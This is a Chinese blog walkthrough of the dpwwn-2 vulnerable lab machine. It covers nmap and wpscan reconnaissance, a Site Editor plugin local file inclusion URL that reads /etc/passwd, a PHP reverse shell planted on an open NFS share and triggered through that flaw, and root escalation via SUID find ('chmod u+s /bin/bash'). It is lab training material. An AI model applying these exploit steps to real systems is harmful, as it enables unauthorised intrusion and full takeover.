天道酬勤

dwppn-2-WALKTHROUGH

此靶机做了静态IP设置,IP为:10.10.10.10。所以在vm中,我们kali和靶机的网络模式都要选择仅主机模式。

在虚拟网络编辑器中,添加一个新的仅主机模式网络,禁用DHCP,子网为10.10.10.0

之后,将kali和靶机的网络模式都选择为我们刚才新设置的仅主机模式的网卡。

在kali中执行以下命令配置IP:

ifconfig eth0 10.10.10.9 netmask 255.255.255.0

待配置好之后,我们使用kali对靶机进行ping命令:

成功ping通,证明kali和靶机的连通性,开干!

一、端口探测

使用Nmap

root@kali:~# nmap -sS -A 10.10.10.10 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 21:55 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.10
Host is up (0.00042s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE   VERSION
80/tcp   open  http      Apache httpd 2.4.38 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: WordPress login page.
|_http-server-header: Apache/2.4.38 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp  open  rpcbind   2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      41899/tcp   mountd
|   100005  1,2,3      52567/tcp6  mountd
|   100005  1,2,3      57323/udp   mountd
|   100005  1,2,3      60108/udp6  mountd
|   100021  1,3,4      37268/udp6  nlockmgr
|   100021  1,3,4      38769/udp   nlockmgr
|   100021  1,3,4      43371/tcp6  nlockmgr
|   100021  1,3,4      45915/tcp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
443/tcp  open  ssl/https Apache/2.4.38 (Ubuntu)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: WordPress login page.
|_http-server-header: Apache/2.4.38 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
2049/tcp open  nfs_acl   3 (RPC #100227)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:58:B1:6F (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/25%OT=80%CT=1%CU=39262%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5E5527D2%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.12 seconds

开放了801114432049,我们先从web开启(Web就是靶机套路的开端)。

后记:NFS挂载一般就是开放的111端口和2049端口。

二、漏洞寻找

查看了web服务,仅有短短的一句话,但是通过nmap的扫描,我们能够看到应该是一个wordpress站点。我们先使用dirb来探测一下目录:

没用发现可疑的文件,反而更加证实了该wordpress站点。

面对wordpress站点,就要拿出wpscan。

wpscan --url http://10.10.10.10/wordpress/
wpscan --url http://10.10.10.10/wordpress/ -e u   #列举站点上的用户

最终得到了两个比较重要的线索:

站点中使用的插件:

站点的用户,只有admin:

插件可能存在漏洞,admin可以爆破,那先去查找一下插件的漏洞吧。

searchsploit site editor

果然在其中发现了猫腻,站点中该插件的版本就为1.1.1,八成是本地文件包含没错了。

searchsploit site editor -m exploits/php/webapps/44340.txt   #将exp保存到当前路径

红框内是用于攻击的exp。

http://10.10.10.10/wordpress//wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

/etc/passwd文件成功读取,并从中发现了用户:rootadmin

都到这一步了,那就ssh爆破呗。但是我忘了,很重要的一点,靶机没用开放22端口,这时我回过头仔细看,原来靶机考察的是NFS挂载

使用命令showmount -e HOSTIP查看nfs共享目录情况:

可以看到/home/dpwwn02目录是对所有人开放的。那我们就对该目录进行挂载:

mount -t nfs 10.10.10.10:/home/dpwwn02 /mnt

挂载成功。

三、反弹shell

接下来,利用kali自带的webshell进行反弹:

将shell保存到/mnt目录下,并重命名为shell.php

使用vim编辑shell:

将IP和端口进行修改,之后保存退出。


接下来,我们在kali开启监听,然后通过插件的本地文件包含漏洞反弹shell:

http://10.10.10.10/wordpress//wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/shell.php

拿到shell了。接下来进行提权。

四、提权

查找SUID权限的程序:

find / type f -perm -u=s 2>/dev/null

发现了find

本来想直接反弹一个root用户的shell,可是该环境没有/bin/sh

今天刚好学了SUID权限,正好可以利用一下命令chmod u+s

find / -exec chmod u+s /bin/bash \;

此时/bin/bash已经有了SUID权限了。

那么,flag到手:


Bash-shell的基本用法:https://blog.csdn.net/qq_41453285/article/details/87715548

Linux-NFS挂载的文章:https://www.cnblogs.com/lizm166/p/10601667.html

提权参考大佬:https://blog.csdn.net/weixin_44214107/article/details/102880743

总的来说,我感觉这个靶机做的不顺,但也OK,学到了新的知识和技巧,加油!

 

赞(2) 打赏
未经允许不得转载:HackerGu‘s Blog » dwppn-2-WALKTHROUGH
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏